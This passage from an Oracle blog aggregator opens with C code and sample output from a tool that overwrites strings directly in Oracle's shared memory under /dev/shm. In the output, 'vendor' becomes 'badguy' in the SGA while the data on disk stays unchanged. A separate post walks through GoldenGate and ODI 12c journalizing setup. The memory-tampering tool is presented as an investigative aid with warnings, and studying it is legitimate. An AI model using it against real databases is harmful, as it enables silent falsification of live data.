        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

Rittman Mead Consulting - Thu, 2014-07-10 15:26

In this post, the finale of the four-part series “GoldenGate and Oracle Data Integrator – A Perfect Match in 12c”, I’ll walk through the setup of the ODI Models and start journalizing in “online” mode. This will utilize our customized JKM to build the GoldenGate parameter files based on the ODI Metadata and deploy them to both the source and target GoldenGate installation locations. Before I get into all of the details, let’s recap the first 3 posts and see how we arrived at this point.

Part one of the series, Getting Started, led us through a quick review of the Oracle Reference Architecture for Information Management and the tasks we’re trying to accomplish; loading both the Raw Data Reservoir (RDR) and Foundation schemas simultaneously, using Oracle GoldenGate 12c replication, and set it all up via Oracle Data Integrator 12c. We also reviewed the setup of the GoldenGate JAgent process, necessary for communication between ODI and GoldenGate when using the “online” version of the Journalizing Knowledge Module.

In part two, we reviewed the Journalizing Knowledge Module, “JKM Oracle to Oracle Consistent (OGG Online)”, its new features, and how much it has been improved in ODI 12c. Full integration with Oracle GoldenGate, through the use of the new ODI Tool “OdiOggCommand”, allows for the setup and configuration of GoldenGate process groups, trail file directories, and table-level supplemental logging, all from the ODI JKM.

Most recently, part 3, titled Setup Journalizing, walked us through the customizations of the “JKM Oracle to Oracle Consistent (OGG Online)” that will allow us to create the source-to-foundation replication alongside the standard source-to-RDR setup. We added a set of options, the first to control whether or not we replicat to foundation and the second to capture the ODI Logical Schema corresponding to the foundation schema. Then we added the task that will create the source-to-foundation table mapping inside the GoldenGate replicat parameter file and set the options appropriately. I’ve been using the ODI 12c Getting Started VM, with the 12.1.2 version of ODI, for my demo setup. If you haven’t done so already, you can download the latest version of the VM, with ODI 12.1.3, from the Oracle Technical Network. I’d say that’s enough recap, now on to the final steps for GoldenGate and ODI 12c integration and let’s start journalizing!

Setup ODI Models Create Models

We first need to create the ODI Models and Datastores for the Source, Staging (Raw Data Reservoir) and Foundation tables. I will typically reverse engineer the source tables into a Model first, then copy them to the Staging and Foundation Models. This approach will ensure the column names and data types remain consistent with the source. I then execute a Groovy script to create the additional data warehouse audit columns in each of the Foundation Datastores.

models

Configure JKM

Unlike the 11g version of ODI, in 12c the “JKM Oracle to Oracle Consistent (OGG Online)” Knowledge Module will be set on the source Model. Open up the Model, in this example, PM_SRC, and switch to the Journalizing tab.

model-journalizing

We’ll set the Journalizing Mode to “Consistent Set” and then choose the customized JKM that we have been working with in this example, “JKM Oracle to Oracle Consistent (OGG Online) RM”, from the dropdown list. Now we are presented with the GoldenGate Process Selection parameters and a list of KM Options to configure.

Set the Process Selection parameters for the Capture Process and Delivery Process by selecting the Logical Schemas created in Part 3 - Setup GoldenGate Topology – Schemas. This setting drives the naming of the Extract, Pump, and Replicat parameter files and process groups in GoldenGate. If you plan to use GoldenGate for the initial load, select the processes here as well. I’m not setting mine, as I typically use a batch load tool, such as Oracle Datapump or insert across DBLink to perform the initial load of the target. As you can see in the image below, you can also create the Oracle GoldenGate Logical Schemas from the Model.

model-jkm-process

Next are the set of Options, including the 2 new Options added in the previous post. We can leave several of the values as the default, as they are specific to particular character sets or implementation on a multi-node Oracle RAC setup.

model-jkm-options

The Options we do want to set:

ONLINE - Set to “true” to enable the automatic GoldenGate configuration when Start Journal is run.
LOCAL_TEMP_DIR – Enter a directory local to the machine on which the Start Journal process will be executed. Be sure the user executing the Start Journal process has privileges to create/modify/remove directories and files.
APPLY_FOUNDATION – Custom Option, set to “true” to enable the addition of the source-to-foundation mapping to the GoldenGate Replicat parameter file.
FND_LSCHEMA – The Logical Schema for the Foundation layer, necessary when APPLY_FOUNDATION is true.

After the Options are set, the Model can be saved and closed. Back in the Designer Navigator, add the Datastores to CDC by either selecting each individual Datastore and adding it or by right-clicking the Model and choosing to add the entire set all at once.

model-add-to-cdc

Before we get on with using the JKM, there is one thing I forgot to mention in the previous post. When setting up the Logical Schema for the GoldenGate “Delivery” process, you must also set the target Logical Schema. If you fail to do so, you’ll get an error stating “SnpLSchema does not exist” when attempting any Change Data Capture commands on the source Model.

logical-schema-set-target

With the JKM set and the tables added to Change Data Capture, we can now add a Subscriber. Subscribers allow multiple mappings to consume the change data from the J$ tables at different intervals. For example, a table may be consumed by one mapping every hour, and then by an additional mapping each night. Two different Subscribers would be used in this case. In our example, I’ll create a single Subscriber named “PERFECT_MATCH”. Make sure the process runs successfully, then it’s time to start Journalizing.

Start Capturing Changes

With the setup and configuration out of the way, the rest is up to the JKM. We’re now able to right-click the source Model and select Change Data Capture–>Start Journal. This executes all of the Start Journal related steps in the JKM, which will create the CDC Framework (J$ tables, JV$ views, etc.), generate and deploy the GoldenGate parameter files (Extract, Pump, and Replicat), and configure and start the GoldenGate process groups. Be sure that the source and target GoldenGate Manager and JAgent processes are running prior to executing the Start Journal process. Also, make sure that the database is in ArchiveLog mode and ready for GoldenGate to capture transactions.

After the Start Journal process is successfully completed, you can browse to the source GoldenGate home directory, run GGSCI, and view the status of the OGG process groups.

ogg-src-info-all

It looks like the Extract and Pump are in place and running. Now let’s check out the Replicat on the target GoldenGate installation.

ogg-trg-info-all

Here we see that the Replicat process is in place, but not actually running. Remember from our JKM editing that we commented out the step that will start the Replicat process. This is to ensure we perform an initial load prior to applying any captured change data to the target.

The last bit of work that must be completed is the initial load. I won’t go into details here, but the way I like to do it is to load the source to the target data based on a captured SCN using Oracle Datapump or DBLink rather than using GoldenGate process groups to perform the load. Note: The ODI 12c Getting Started Guide doesn’t even use the OGG initial load! Then, we can start the replicat in GoldenGate after the captured SCN using the same approach I wrote about in a previous blog on ODI and GoldenGate 11g.

JKM “Online” Mode

Beyond adding the parameter files and process groups, what exactly did the “online” version of the JKM do for us? If you browse to the directory that we set in the JKM Options under LOCAL_TEMP_DIR, you’ll find all of the GoldenGate files generated by the JKM. These files were generated locally, then uploaded to their proper GoldenGate home directory. Without “online” mode, they would had to have been manually copied to GoldenGate.

jkm-steps

Once uploaded, the obey files (batch files for GoldenGate commands) were executed.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTEOBEY" "-OBEY_FILE=/home/oracle/Oracle/Middleware/oggsrc/EXTPMSRC.oby"

And finally, JKM steps were generated to perform the creation of the process groups in GoldenGate.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
add extract EXTPMSRC, tranlog, begin now 
add exttrail /home/oracle/Oracle/Middleware/oggsrc/dirdat/oc, extract EXTPMSRC, megabytes 100
stop extract EXTPMSRC
start extract

If you ever need to stop the change data capture process, either to add additional tables or make modifications to the metadata, you can run the Drop Journal process. Not only will the CDC Framework of tables and views be removed, but the “online” mode also reaches into GoldenGate and drops the process groups that were generated by the JKM.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
stop extract RPMEDWP
delete extract RPMEDWP

In conclusion, the integration between GoldenGate and Oracle Data Integrator  in 12c has been vastly improved over the 11g version. The ability to manage the entire setup process from within ODI is a big step forward, and I can only see these two products being further integrated in future releases. If you have any questions or comments about ODI or GoldenGate, or would like some help with your own implementation, feel free to add a comment below or reach out to me at michael.rainey@rittmanmead.com.

 

Categories: BI & Warehousing